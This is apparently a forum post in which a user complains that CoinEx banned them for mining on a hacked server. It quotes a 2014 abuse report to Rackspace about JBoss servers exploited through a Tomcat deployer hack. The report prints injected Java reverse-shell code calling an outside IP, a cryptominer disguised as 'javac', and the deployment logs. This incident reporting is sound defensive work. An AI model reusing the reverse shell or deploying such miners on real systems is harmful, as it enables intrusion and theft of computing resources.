coinex banned my account and steal my money
they sayed i used hacked server for mining lol
i rent me a mining rig and thats all
This was a complaint about your account.
-----
From: Tod Harter <
tharter@whitsendsolutions.com>
Date: Thu, Jan 23, 2014 at 12:50 PM
Subject: Acceptable use violation
To:
abuse@rackspace.com, Nathan Simpson <
nsimpson@whitsendsolutions.com>,
Chris Ranni <
cranni@whitsendsolutions.com>
Dear Sirs,
I have to report to you that two of our JBoss servers were exploited today
using a Tomcat deployer hack. Specifically the following exploit
http://blog.rimuhosting.com/2011/03/17/jboss-exploits-running-python/The following code was injected:
{
Socket socket = new Socket( "
50.57.145.165", 8081 );
Process process =
Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector(
process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector(
socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
Note the IP address of the resulting deployment is a server in a network
address block delegated to Rackspace:
#
# The following results may also be obtained via:
#
http://whois.arin.net/rest/nets;q=50.57.145.165?showDetails=true&showARIN=false&ext=netref2 #
Rackspace Hosting RACKS-8-NET-4 (NET-50-56-0-0-1) 50.56.0.0 - 50.57.255.255
Slicehost RSPC-654321664654 (NET-50-57-128-0-1) 50.57.128.0 - 50.57.159.255
Resulting in an unauthorized deployment as follows:
marx 3259 0.0 0.0 5164 1300 ? S Jan22 0:00 /bin/sh
/opt/marx/jboss-6.0.0.Final-marx/bin/run.sh -c default -b 0.0.0.0
marx 3309 2.3 36.6 1819604 644140 ? Sl Jan22 29:44 \_
/opt/marx/jdk1.7.0_45//bin/java -server -XX:MaxPermSize=256m -Xms256m
-Xmx1284m -Dsun.rmi.dgc.client.gcInterval=3600000
-Dsun.rmi.dgc.server.gcInterval=3600000
marx 12389 0.0 0.0 5160 1256 ? S 17:41 0:00 \_
/bin/sh
marx 12412 194 0.0 39612 1192 ? Sl 17:42 83:23
\_ ./javac -a scrypt -o stratum+tcp://stratum.coinex.pw:9933 -u nirgends2
-p 123456
This is clearly a bitcoin mining application, crudely disguised.
The relevant log record from JBoss being:
2014-01-23 17:41:11,814 INFO [org.jboss.deployment.MainDeployer]
(http-0.0.0.0-8080-6) deploy, url=http://50.57.145.165:60000/MDSerqWz.war
2014-01-23 17:41:12,030 INFO
[org.jboss.web.tomcat.service.deployers.TomcatDeployment]
(http-0.0.0.0-8080-6) deploy, ctxPath=/MDSerqWz
I'm guessing the server at 50.57.145.165 has already been compromised in
some way, but I would only be guessing. I'd appreciate it if you guys would
take a look and notify whoever is running that machine that they'll need to
clean it up! We will patch our systems as well.
Thanks
Sincerely,
Tod G. Harter
Managing Partner
Whit's End Solutions, LLP
